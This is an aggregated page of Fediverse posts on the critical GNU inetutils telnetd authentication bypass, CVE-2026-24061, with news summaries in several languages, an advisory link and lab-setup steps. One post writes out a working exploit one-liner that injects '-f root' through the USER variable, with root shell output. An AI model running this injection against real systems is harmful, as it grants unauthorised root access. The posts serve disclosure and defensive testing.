#telnetd — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #telnetd, aggregated by home.social.
-
Krytyczna podatność w telnetd
Początkowo informacja na temat wykrycia (kolejnej) podatności w Telnetd przeszła bez echa. Wszak Telnet to bardzo stary protokół. Niska popularność rozwiązania może tłumaczyć, dlaczego problem początkowo nie wzbudził większego zainteresowania… TLDR: Telnet to rozwiązanie, które swoje największe triumfy święciło w czasach, kiedy nikomu jeszcze nie śnił się powszechny dostęp do...
#WBiegu #Linemode #Podatność #Telnet #Telnetd #Vulnerability
-
Krytyczna podatność w telnetd
Początkowo informacja na temat wykrycia (kolejnej) podatności w Telnetd przeszła bez echa. Wszak Telnet to bardzo stary protokół. Niska popularność rozwiązania może tłumaczyć, dlaczego problem początkowo nie wzbudził większego zainteresowania… TLDR: Telnet to rozwiązanie, które swoje największe triumfy święciło w czasach, kiedy nikomu jeszcze nie śnił się powszechny dostęp do...
#WBiegu #Linemode #Podatność #Telnet #Telnetd #Vulnerability
-
Krytyczna podatność w telnetd
Początkowo informacja na temat wykrycia (kolejnej) podatności w Telnetd przeszła bez echa. Wszak Telnet to bardzo stary protokół. Niska popularność rozwiązania może tłumaczyć, dlaczego problem początkowo nie wzbudził większego zainteresowania… TLDR: Telnet to rozwiązanie, które swoje największe triumfy święciło w czasach, kiedy nikomu jeszcze nie śnił się powszechny dostęp do...
#WBiegu #Linemode #Podatność #Telnet #Telnetd #Vulnerability
-
Krytyczna podatność w telnetd
Początkowo informacja na temat wykrycia (kolejnej) podatności w Telnetd przeszła bez echa. Wszak Telnet to bardzo stary protokół. Niska popularność rozwiązania może tłumaczyć, dlaczego problem początkowo nie wzbudził większego zainteresowania… TLDR: Telnet to rozwiązanie, które swoje największe triumfy święciło w czasach, kiedy nikomu jeszcze nie śnił się powszechny dostęp do...
#WBiegu #Linemode #Podatność #Telnet #Telnetd #Vulnerability
-
Krytyczna podatność w telnetd
Początkowo informacja na temat wykrycia (kolejnej) podatności w Telnetd przeszła bez echa. Wszak Telnet to bardzo stary protokół. Niska popularność rozwiązania może tłumaczyć, dlaczego problem początkowo nie wzbudził większego zainteresowania… TLDR: Telnet to rozwiązanie, które swoje największe triumfy święciło w czasach, kiedy nikomu jeszcze nie śnił się powszechny dostęp do...
#WBiegu #Linemode #Podatność #Telnet #Telnetd #Vulnerability
-
This Week In Security: Getting Back Up to Speed
-
This Week In Security: Getting Back Up to Speed
-
This Week In Security: Getting Back Up to Speed
-
This Week In Security: Getting Back Up to Speed
-
This Week In Security: Getting Back Up to Speed
-
#Telnet-Sicherheitslücke: Wegen kritischen Risikos patchen | Security https://www.heise.de/news/Kritische-telnetd-Luecke-Patchen-aber-Panik-ist-unbegruendet-11155419.html #Patchday #telnetd #OpenSource
-
Warning: computer nerd stuff below:
So. In 2026, telnet is still a thing.
Really? 😑ubuntu@ubuntu:~$ USER=“-f root” telnet -a victim.ip.address
[usual Ubuntu /etc/issue text]
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)You’re welcome.
-
Security Week 2605: тривиальная ошибка в telnetd
20 января разработчик Саймон Йозефссон опубликовал в рассылке oss-sec информацию о крайне серьезной уязвимости в демоне telnetd, реализующем удаленное подключение по протоколу telnet. В традиционной для описания уязвимости терминологии суть проблемы заключается в следующем: «ошибка в обработке входящих данных позволяет злоумышленнику пропустить процесс аутентификации и получить на подверженной уязвимости системе права суперпользователя». Применение таких терминов обычно обозначает, что подлинное описание проблемы либо слишком длинное, либо слишком сложное для понимания, но в данном случае это не так. При подключении к telnetd нужно указать имя пользователя. Его программа передает стандартной утилите login , причем передача осуществляется без предварительной проверки ввода от желающего подключиться. Если указать вместо имени пользователя строку «-f root», эти данные будут переданы в утилиту login, а она уже залогинит любого желающего под рутом без какой-либо авторизации, увидев соответствующий ключ -f. Собственно, это вся уязвимость как есть.
-
I've successfully tested the PoC in the #SafeBreach Labs GitHub repository. It seems like a good place to start to write a checker (if there isn't a good one).
-
Any good, legitimate checker around for CVE-2026-24061 ?
Exploitation is trivial, checking for the vulnerability, not so much.
-
Exploitation is completely trivial...
-
vagrant init debian/bookworm64
vagrant up
vagrant ssh
sudo bash
apt update
apt install inetutils-telnetd=2:2.4-2+deb12u1 inetutils-telnet=2:2.4-2+deb12u1- Edit
/etc/inetd.confto enabletelnetd systemctl restart inetutils-inetd- Check telnet is running (
ss -tupln | grep :23)
Congratulations, you got yourself a system vulnerable to CVE-2026-24061 !
- Edit
-
Here I am installing #telnetd on Debian in the laboratory... To test CVE-2026-24061.
-
2.7までのGNU inetutilsに含まれるtelnetdに、細工した環境変数を送信するだけで認証を回避して特権ユーザーでのログインが可能な脆弱性が発見されたらしい。CVE-2026-24061。いまどきtelnetdをThe Internetに露出している人はそうそういないはずとはいえ、なかなか興味深いので調べてみたところ。`telnetd`が`execv()`で呼び出す`/usr/bin/login`のコマンドラインオプションをうまく使うことでそういうことができてしまうようで、正直興奮した。
#CVE #GNU #inetutils #login #telnetd #サイバーセキュリティ #セキュリティ #情報セキュリティ #脆弱性
-
I wonder how many IoT appliances, abandoned by its vendor, can now be liberated thanks to the recent telnetd-bug.
-
Looking at the commit and the code as it still stands today, it is interesting that only on Solaris does it even try to use -- in the arguments to login to signal the end of options, and even then only in limited circumstances.
#FreeBSD telnetd, for comparison, always puts -- in before the supplied account name.
I wonder how long it will be before the lesson is properly learned.
-
GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
🔗 https://vulnerability.circl.lu/vuln/gcve-1-2026-0007
#telnet #telnetd #cybersecurity #vulnerability
@gcve GCVE-1-2026-0007
-
Telnet Gets Stubborn Sony Camera Under Control - According to [Venn Stone], technical producer over at LinuxGameCast, the Sony a500... - https://hackaday.com/2022/11/25/telnet-gets-stubborn-sony-camera-under-control/ #digitalcamerashacks #softwarehacks #firmwarehack #busybox #telnetd #telnet #sony